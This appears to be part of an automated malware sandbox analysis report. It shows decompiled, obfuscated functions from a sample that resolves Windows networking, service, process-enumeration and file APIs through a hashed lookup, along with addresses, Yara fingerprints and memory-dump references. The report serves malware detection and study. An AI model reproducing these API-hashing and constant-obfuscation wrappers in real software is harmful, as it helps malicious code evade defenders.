				_v8 = _v8 ^ 0xd1609914;
				E002107A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00205fb5
0x00205fb6
0x00205fb7
0x00205fbb
0x00205fbc
0x00205fc1
0x00205fcb
0x00205fd7
0x00205fde
0x00205fe5
0x00205ffc
0x00205fff
0x00206006
0x0020600d
0x0020601a
0x00206025
0x0020602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00206025

Memory Dump Source

Source File: 0000000D.00000002.2122425007.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 0000000D.00000002.2122417796.0000000000200000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2122452691.000000000021C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 76fbbdc28915d750aa5ebdd8dec519401d2efdf456955c9928a193752fe3b1b4
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: F6F04FB4C11208FFDB08DFA0E94689EBFB9EB40300F208198E409A7260E7B15F569F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2984 Parent PID: 2344 rundll32.exeCOMMON

Executed Functions

Function 001E023A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001E023A(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				signed int _v8;
				signed int _v12;
				void* _t25;
				int _t31;
				void* _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t37 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t25);
				_v12 = 0x4c1d;
				_v12 = _v12 ^ 0x5ad90362;
				_v12 = _v12 ^ 0x5ad955af;
				_v8 = 0xc5f7;
				_v8 = _v8 * 0x75;
				_v8 = _v8 ^ 0x98520be0;
				_v8 = _v8 + 0xd998;
				_v8 = _v8 ^ 0x98094817;
				E001E07A9(0xb92c1268, 0x1f801b8, __ecx, __ecx, 0x1c9);
				_t31 = InternetReadFile(_t37, _a8, _a16, _a20); // executed
				return _t31;
			}

0x001e023d
0x001e023e
0x001e0240
0x001e0243
0x001e0245
0x001e0248
0x001e024b
0x001e024e
0x001e0252
0x001e0253
0x001e0258
0x001e0262
0x001e026e
0x001e0275
0x001e028c
0x001e028f
0x001e0296
0x001e029d
0x001e02aa
0x001e02bc
0x001e02c2

APIs

InternetReadFile.WININET(00000000,2CD2473D,0003F015,FFEAC835), ref: 001E02BC

Strings

k policy storage creation failed. You might not have administrative access rights.yThe wireless network policy storage could not b, xrefs: 001E0269

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileInternetRead
String ID: k policy storage creation failed. You might not have administrative access rights.yThe wireless network policy storage could not b
API String ID: 778332206-1186708885
Opcode ID: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
Instruction ID: e11fa93d9a8e03fc9e2eda0aac994c379a4b878c9fddca600667ecea5518bb18
Opcode Fuzzy Hash: 5aea17a31f83cfee10962f094a32e89ed49328cc982311645bc2611183f53528
Instruction Fuzzy Hash: 50014C75901208FFEF05EF94D9068DEBFB9EF04314F108188F90466261D3729F61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D75AE, Relevance: 1.6, APIs: 1, Instructions: 62
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001D75AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				signed int _t55;
				void* _t63;
				void* _t64;

				_t64 = __edx;
				E001D602B(_t43);
				_v8 = 0x98b5;
				_v8 = _v8 >> 9;
				_t54 = 0x5f;
				_v8 = _v8 / _t54;
				_v8 = _v8 + 0xffff1c63;
				_v8 = _v8 ^ 0xffff635b;
				_v12 = 0x5016;
				_v12 = _v12 + 0xffff6b9b;
				_t55 = 0x41;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x03f03403;
				_t51 = E001E07A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
				return _t52;
			}

0x001d75b7
0x001d75d8
0x001d75dd
0x001d75e7
0x001d75f2
0x001d75f7
0x001d75fc
0x001d7603
0x001d760a
0x001d7611
0x001d761b
0x001d7623
0x001d762b
0x001d763f
0x001d765c
0x001d7662

APIs

CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 001D765C

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CryptDecodeObject
String ID:
API String ID: 1207547050-0
Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
Instruction ID: d1b7d889468b05e271e56aa046f4c9acf0d627d5c9e63d23a21038f9e255c7cf
Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
Instruction Fuzzy Hash: 4A21067290060CFFDF06CF94DC46DDE7F76EB08324F148148FA18662A0D7B29A61AB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D109C, Relevance: 1.5, APIs: 1, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E001D109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				void* _t38;
				signed int _t40;
				WCHAR* _t46;

				_push(_a16);
				_t46 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001D602B(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0xf19a8;
				_v20 = 0x58c643;
				_v12 = 0xbcc6;
				_v12 = _v12 | 0xbb59ffff;
				_v12 = _v12 ^ 0xbb59839d;
				_v8 = 0x5dbd;
				_v8 = _v8 << 0xd;
				_t40 = 0x3f;
				_v8 = _v8 / _t40;
				_v8 = _v8 * 0x1f;
				_v8 = _v8 ^ 0x05c44d1b;
				E001E07A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
				_t38 = FindFirstFileW(_t46, _a4); // executed
				return _t38;
			}

0x001d10a3
0x001d10a6
0x001d10a8
0x001d10ab
0x001d10ae
0x001d10b1
0x001d10b3
0x001d10b8
0x001d10bf
0x001d10c8
0x001d10cf
0x001d10d6
0x001d10dd
0x001d10e4
0x001d10eb
0x001d10f4
0x001d10fc
0x001d110f
0x001d1112
0x001d111f
0x001d112b
0x001d1131

APIs

FindFirstFileW.KERNEL32(?,BB59839D), ref: 001D112B

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
Instruction ID: beb6727af06f58d2096974663c1cfa80e81fa8df65693c508001a0251c11bfb9
Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
Instruction Fuzzy Hash: B01157B5D01208FFDF04EFA8D94A9DEBFB5EF44314F208099E9086B251D7B14B249B91

Uniqueness

Uniqueness Score: -1.00%

Function 001D1C88, Relevance: 1.5, APIs: 1, Instructions: 38
processCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E001D1C88(int _a12) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t28;
				signed int _t29;

				_v28 = 0x4309a9;
				asm("stosd");
				_t29 = 0x31;
				asm("stosd");
				asm("stosd");
				_v12 = 0x7af7;
				_v12 = _v12 + 0x2003;
				_v12 = _v12 ^ 0x000083a5;
				_v8 = 0xa138;
				_v8 = _v8 << 8;
				_v8 = _v8 / _t29;
				_v8 = _v8 ^ 0x00030e85;
				E001E07A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
				return _t28;
			}

0x001d1c8f
0x001d1c9d
0x001d1ca0
0x001d1ca3
0x001d1ca6
0x001d1ca7
0x001d1cae
0x001d1cb5
0x001d1cbc
0x001d1cc3
0x001d1cd6
0x001d1cd9
0x001d1ce6
0x001d1cf3
0x001d1cf9

APIs

CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 001D1CF3

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
Instruction ID: 14e9230b55c412e360ad8d4c25a55e4bd7cc13bf593d40e590c76ddb21d1c1d5
Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
Instruction Fuzzy Hash: 38F03C71E01208BBFB04DFA8CD4A69EFBB6EF94704F208099E5006B291DBF55F558B91

Uniqueness

Uniqueness Score: -1.00%

Function 001D5A52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
networkCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E001D5A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				unsigned int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t25;
				void* _t31;
				WCHAR* _t37;

				_t37 = __ecx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				_push(__ecx);
				E001D602B(_t25);
				_v28 = 0x354aea;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0x4733;
				_v8 = _v8 << 0xb;
				_v8 = _v8 + 0xffffa4b2;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x00006f5b;
				_v12 = 0x6e5;
				_v12 = _v12 ^ 0x21b9cf62;
				_v12 = _v12 ^ 0x21b9d5f6;
				E001E07A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
				return _t31;
			}

0x001d5a5d
0x001d5a5f
0x001d5a60
0x001d5a63
0x001d5a66
0x001d5a69
0x001d5a6c
0x001d5a6f
0x001d5a70
0x001d5a71
0x001d5a72
0x001d5a77
0x001d5a86
0x001d5a91
0x001d5a99
0x001d5a9a
0x001d5aa1
0x001d5aa5
0x001d5aac
0x001d5ab0
0x001d5ab7
0x001d5abe
0x001d5ac5
0x001d5ad2
0x001d5ae1
0x001d5ae9

APIs

InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 001D5AE1

Strings

k policy storage creation failed. You might not have administrative access rights.yThe wireless network policy storage could not b, xrefs: 001D5A87
J5, xrefs: 001D5A77

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: InternetOpen
String ID: k policy storage creation failed. You might not have administrative access rights.yThe wireless network policy storage could not b$J5
API String ID: 2038078732-1213306130
Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
Instruction ID: 561bd57e7fe842d67b8c485c8933f3e12ef1485055328bb178474127ed22206e
Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
Instruction Fuzzy Hash: 33113C7290060CBFEB05DF98DD859DFBB79EF18358F104098FA0562120D3B64E659BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E7955, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
networkCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E001E7955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t41;
				short _t47;

				_push(_a52);
				_t47 = __ecx;
				_push(0);
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__ecx & 0x0000ffff);
				E001D602B(__ecx & 0x0000ffff);
				_v24 = 0x1f9770;
				_v20 = 0x380697;
				_v16 = 0;
				_v12 = 0x6440;
				_v12 = _v12 * 0xf;
				_v12 = _v12 * 0x65;
				_v12 = _v12 ^ 0x02513e1b;
				_v8 = 0x9d26;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x42bae3e2;
				_v8 = _v8 + 0x19dc;
				_v8 = _v8 ^ 0x40ce99cc;
				E001E07A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
				return _t41;
			}

0x001e795d
0x001e7962
0x001e7964
0x001e7965
0x001e796b
0x001e796c
0x001e796f
0x001e7972
0x001e7975
0x001e7978
0x001e7979
0x001e797c
0x001e797f
0x001e7980
0x001e7984
0x001e7985
0x001e798a
0x001e7994
0x001e79a0
0x001e79a3
0x001e79ba
0x001e79c1
0x001e79c4
0x001e79cb
0x001e79d2
0x001e79d6
0x001e79dd
0x001e79e4
0x001e79f1
0x001e7a07
0x001e7a0e

APIs

InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 001E7A07

Strings

k policy storage creation failed. You might not have administrative access rights.yThe wireless network policy storage could not b, xrefs: 001E799B

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ConnectInternet
String ID: k policy storage creation failed. You might not have administrative access rights.yThe wireless network policy storage could not b
API String ID: 3050416762-1186708885
Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
Instruction ID: 5f79b89392ae9b9f4cf3396907ed4ecd0c45e82a726b71f1c640ea151bed3f6e
Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
Instruction Fuzzy Hash: 96212472800248BBCF119F92CD49CDFBFB9FF89718F108199F90566220D7719A60DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001D2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001D2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001D602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001E07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001D29DC

Strings

<^, xrefs: 001D2977

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
Instruction ID: 2def957fbdd76c8f6afaa0a2bd22bc4160f696d70807745a4914eae7dc807cb6
Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
Instruction Fuzzy Hash: A6018072A00108BFEB14DF95DC4A8DFBFB6EF48310F108089F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001DC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001DC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001D602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001E07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001dc6e1
0x001dc6e6
0x001dc6f0
0x001dc6fc
0x001dc703
0x001dc706
0x001dc70d
0x001dc711
0x001dc715
0x001dc71c
0x001dc723
0x001dc72a
0x001dc731
0x001dc738
0x001dc751
0x001dc762
0x001dc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001DC762

Strings

/O, xrefs: 001DC6E6

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
Instruction ID: 4a01790a23612c8bc0685b17fe082e26f4db6c5654d638d0cee67d8c555ea358
Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
Instruction Fuzzy Hash: D31133B290122DBBCB25DF95DC498DFBFB8EF14714F108188F90962210D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001E8422, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E001E8422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t33;
				int _t40;

				_push(_a28);
				_push(_a24);
				_push(0xffffffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t33);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x2f14d8;
				_v24 = 0x27cc4d;
				_v8 = 0xcfda;
				_v8 = _v8 << 7;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 ^ 0xd01d7588;
				_v8 = _v8 ^ 0xdae8f2b7;
				_v12 = 0x64c6;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x001c0252;
				E001E07A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
				return _t40;
			}

0x001e8428
0x001e842b
0x001e842e
0x001e8430
0x001e8433
0x001e8436
0x001e8439
0x001e843d
0x001e843e
0x001e8443
0x001e844a
0x001e8453
0x001e845a
0x001e8461
0x001e8468
0x001e847c
0x001e847f
0x001e8486
0x001e848d
0x001e8498
0x001e849b
0x001e84a8
0x001e84be
0x001e84c3

APIs

HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 001E84BE

Strings

k policy storage creation failed. You might not have administrative access rights.yThe wireless network policy storage could not b, xrefs: 001E844E

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: HttpRequestSend
String ID: k policy storage creation failed. You might not have administrative access rights.yThe wireless network policy storage could not b
API String ID: 360639707-1186708885
Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
Instruction ID: 57fa4e13b6e622979d645490307b757216bb70a525762bc601cc4633970d8890
Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
Instruction Fuzzy Hash: 211116B180120DFFCF05DF94CD4699EBFB6AB54314F208288F924662A1C3768B649B80

Uniqueness

Uniqueness Score: -1.00%

Function 001DF74E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001DF74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t28;
				intOrPtr* _t35;
				void* _t36;
				signed int _t38;
				void* _t44;
				void* _t45;

				_t45 = __edx;
				E001D602B(_t28);
				_v8 = 0x515c;
				_v8 = _v8 + 0xc7b4;
				_t38 = 0xc;
				_v8 = _v8 / _t38;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000000a5;
				_v12 = 0xe7ac;
				_v12 = _v12 * 3;
				_v12 = _v12 ^ 0xe245e609;
				_v12 = _v12 ^ 0xe24720e8;
				_t35 = E001E07A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
				return _t36;
			}

0x001df757
0x001df765
0x001df76a
0x001df774
0x001df782
0x001df787
0x001df78f
0x001df793
0x001df79a
0x001df7ac
0x001df7af
0x001df7b6
0x001df7c3
0x001df7d1
0x001df7d7

APIs

ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 001DF7D1

Strings

G, xrefs: 001DF7B6

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AgentObtainStringUser
String ID: G
API String ID: 2681117516-4236931613
Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
Instruction ID: 3dfd59226a9a73a89e326c6cbb46ecce2a6bafac167b347d8ec13eff237ab34a
Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
Instruction Fuzzy Hash: 84015771900208FFEB04DF94DD4AA9EBFB5EF84310F208088F50866290E7B15F60DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D76F7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E001D76F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t28;
				void* _t35;
				signed int _t37;
				struct tagPROCESSENTRY32W* _t43;

				_push(_a8);
				_t43 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001D602B(_t28);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x5756b4;
				_v20 = 0x17430f;
				_v12 = 0x6271;
				_t37 = 0x43;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x00004051;
				_v8 = 0x9292;
				_v8 = _v8 + 0x9a70;
				_v8 = _v8 << 0xb;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0x3dcb9719;
				_t35 = E001E07A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
				Process32FirstW(_a8, _t43); // executed
				return _t35;
			}

0x001d76fe
0x001d7701
0x001d7703
0x001d7706
0x001d7707
0x001d7708
0x001d770d
0x001d7714
0x001d771d
0x001d7724
0x001d7730
0x001d7738
0x001d7740
0x001d7747
0x001d774e
0x001d7755
0x001d7764
0x001d7767
0x001d7774
0x001d7780
0x001d7786

APIs

Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 001D7780

Strings

nS8U, xrefs: 001D775F

Memory Dump Source

Source File: 0000000E.00000002.2349243724.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000E.00000002.2349238675.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2349255651.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FirstProcess32
String ID: nS8U
API String ID: 2623510744-2564412997
Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
Instruction ID: c091985026c5ffe9f44bbb234851bda50a2ddccc0d255bb09f01ac43eb172531
Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
Instruction Fuzzy Hash: E20165B5D01208FBEB04DFA4D90A9DEBFB5EF50314F208089E8186B251E7B15F249B81

Uniqueness

Uniqueness Score: -1.00%

Function 001D1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001D1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001D602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E001E07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001D1096

Strings

[, xrefs: 001D103B

